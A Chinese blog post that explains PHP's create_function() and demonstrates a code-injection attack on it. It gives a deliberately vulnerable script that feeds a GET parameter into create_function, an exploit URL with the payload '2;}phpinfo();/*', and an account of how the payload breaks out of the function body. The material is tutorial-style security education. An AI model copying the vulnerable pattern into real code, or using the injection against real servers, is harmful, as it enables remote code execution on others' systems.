文档章节

PHP create_function()代码注入,PHP7.2竟然还存在

虎爷
 虎爷
发布于 2018/11/21 10:23
字数 253
阅读 1.8K
收藏 1

第一部分:介绍php函数 create_function

string create_function    ( string $args   , string $code   )

string $args 变量部分

string $code 方法代码部分

举例:

create_function('$fname','echo $fname."Zhang"')

类似于:

function fT($fname) {
  echo $fname."Zhang";
}

举一个官方提供的例子:

<?php
$newfunc = create_function('$a,$b', 'return "ln($a) + ln($b) = " . log($a * $b);');
echo "New anonymous function: $newfunc";
echo $newfunc(2, M_E) . "
";
// outputs
// New anonymous function: lambda_1
// ln(2) + ln(2.718281828459) = 1.6931471805599

第二部分:如何利用create_function()代码注入

测试环境版本:

apache +php 5.2、apache +php 5.3

有问题的代码:

<?php
//02-8.php?id=2;}phpinfo();/*
$id=$_GET['id'];
$str2='echo  '.$a.'test'.$id.";";
echo $str2;
echo "<br/>";
echo "==============================";
echo "<br/>";
$f1 = create_function('$a',$str2);
echo "<br/>";
echo "==============================";

利用方法:

http://localhost/libtest/02-8.php?id=2;}phpinfo();/*

 

实现原理:

由于id=2;}phpinfo();/*

执行函数为:

function fT($a) {
  echo "test".$a;
}

注入代码后:

function fT($a) {
  echo "test";}
  phpinfo();/*;//此处为注入代码。
}

测试效果:

虎爷
粉丝 1
博文 1
码字总数 253
作品 0
福州
后端工程师
私信 提问
加载中
请先登录后再评论。

暂无文章

Python -- socket 实现服务器之间的通信

  现在需要做一个分布式课程设计(简单小游戏),三个人小组合作完成。   我需要设计一个登录注册服务器,接收来自网关服务器(消息中间件)的用户登录注册消息请求,然后生成访问数据库...

osc_a7a1prn6
13分钟前
0
0
20199102 2019-2020-2 《网络攻防实践》第十一周作业

20199102 2019-2020-2 《网络攻防实践》第十一周作业 关于sql注入和XSS攻击感觉自己叙述能力并不够,但是实践过程中给出了完整的攻击、分析、防御的过程。 1.实践内容 1.1Web应用程序体系结...

osc_eijo4qvb
13分钟前
0
0
我们无法在此设备上激活windows,因为无法连接到你的组织的激活服务器。请确保已连接到你的组织服务器,然后重试。如果仍存在激活问题,请联系组织的支持人员,错误代码:ox80070078

本人承接各种高校C语言、C++、Java语言等课程设计以及ppt等制造,以及常见的电脑故障有需要的私信我或者微信15813406574 一般Windows都会有一个试用期,试用期到了还没有激活系统的话就会提示...

osc_2frf70qv
14分钟前
0
0
.net core Web API参数绑定规则

参数推理绑定 先从一个问题说起,微信小程序按照WebAPI定义的参数传递,Get请求服务器端可以正常接收到参数,但是Post请求取不到。 Web API代码(.netcore 3.1)如下: [HttpGet("Login")]p...

osc_wcq210y3
16分钟前
6
0
[Logstash]使用详解

  Logstash是一款轻量级的日志搜集处理框架,可以方便的把分散的、多样化的日志搜集起来,并进行自定义的处理,然后传输到指定的位置,比如某个服务器或者文件。   本文针对官方文档进行...

osc_zqxv5pte
16分钟前
0
0

没有更多内容

加载失败,请刷新页面

加载更多

返回顶部
顶部